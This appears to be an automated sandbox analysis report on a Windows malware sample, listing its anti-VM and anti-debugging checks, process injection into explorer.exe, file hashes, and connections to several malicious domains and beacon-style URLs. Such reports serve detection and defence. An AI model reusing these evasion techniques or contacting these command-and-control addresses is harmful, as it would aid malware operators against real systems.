Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 00000000.00000002.254778297.0000000002D31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zHgm9k7WYU.exe PID: 1928, type: MEMORY

Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 00000000010A98E4 second address: 00000000010A98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 00000000010A9B5E second address: 00000000010A9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe TID: 2260	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe TID: 4132	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5256	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5256	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 4396	Thread sleep time: -90000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000002.00000000.273817889.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.257951536.00000000011EE000.00000004.00000020.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.272926812.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.273817889.000000000891C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp	Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000002.00000002.569426220.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000002.569770754.00000000011EE000.00000004.00000020.sdmp	Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60102-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
Source: explorer.exe, 00000002.00000000.273897961.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000002.00000002.580860292.00000000053D7000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000002.00000000.272926812.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.272926812.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.273897961.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmp	Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000002.00000000.272926812.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\explorer.exe	Network Connect: 154.86.142.251 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.224.182.242 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.59.242.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.49.23.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread register set: target process: 3472			Jump to behavior

Source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp, explorer.exe, 00000002.00000002.582295532.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000007.00000002.571905610.0000000003C90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000002.570010507.0000000001640000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.571905610.0000000003C90000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.570010507.0000000001640000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.571905610.0000000003C90000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp	Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
Source: explorer.exe, 00000002.00000002.569152614.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000002.570010507.0000000001640000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.571905610.0000000003C90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000002.570010507.0000000001640000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.571905610.0000000003C90000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

IP	Domain	Country	ASN	ASN Name	Malicious
199.59.242.153	unknown	United States	395082	BODIS-NJUS	true
198.49.23.144	unknown	United States	53831	SQUARESPACEUS	false
154.86.142.251	unknown	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
103.224.182.242	unknown	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true

Name	IP	Active
www.www7456.com	154.86.142.251	true
www.fallgus.com	103.224.182.242	true
ricardoinman.com	34.102.136.180	true
ext-sq.squarespace.com	198.49.23.144	true
www.bigdudedesign.com	199.59.242.153	true
www.ricardoinman.com	unknown	unknown
www.theatomicshots.com	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.ricardoinman.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl	true	Avira URL Cloud: safe	unknown
http://www.bigdudedesign.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0	true	Avira URL Cloud: safe	unknown
http://www.theatomicshots.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns	true	Avira URL Cloud: safe	unknown
http://www.www7456.com/xle/?uXrpEpT=uzo0q0TnKI1EbCdNPQJu8iBLwxReibO1ZCV2f0LDQIq1wR/qMfZZPE6SLM+PUhnJc0M8&0V3lvN=YvRXzPexWxVddR	true	Avira URL Cloud: safe	unknown

ID:	339322
Product:	CloudBasic
Start time:	20:57:25
Start date:	13.01.2021
Sample:	zHgm9k7WYU.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	d97a26894ec19dc562eec833ccb5607f
SHA1:	5aa0632c496d7e1441eef50c61c6a97c5adee565
SHA256:	2fdfbfc735f43a4e2dce0c849b41ab83dd17228f6df983f7a95d6e427cdc77b0
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Analysis Report zHgm9k7WYU.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs